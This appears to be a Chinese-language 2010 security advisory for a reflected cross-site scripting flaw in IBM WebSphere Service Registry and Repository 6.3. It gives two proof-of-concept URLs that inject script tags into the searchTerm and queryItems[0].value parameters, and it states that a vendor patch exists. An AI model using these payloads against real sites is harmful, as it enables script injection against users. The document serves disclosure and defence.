发布日期:2010-08-06
更新日期:2010-08-09
受影响系统:
IBM WebSphere Service Registry and Repository 6.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 42281
WebSphere Service Registry and Repository是用于存储、访问和管理信息(通常是指服务元数据)的系统。
当queryConditionGroupType设置为AND的时候,WebSphere Service Registry and Repository没有正确地过滤提交给ServiceRegistry/HelpSearch.do的searchTerm参数和提交给ServiceRegistry/QueryWizardProcessStep1.do的queryItems[0].value参数便返回给了用户,这可能导致跨站脚本攻击。
<*来源:IBM (ncsupp@ca.ibm.com)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/ServiceRegistry/HelpSearch.do?searchTerm=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3C
/ServiceRegistry/QueryWizardProcessStep1.do?queryConditionGroupType=AND&queryItems[0].value=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&queryItems[1].value=&queryItems[2].value=&queryItems[3].value=&queryItems[4].value=&wizard.button.setClassification=&wizard.button.next=Next
建议:
--------------------------------------------------------------------------------
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: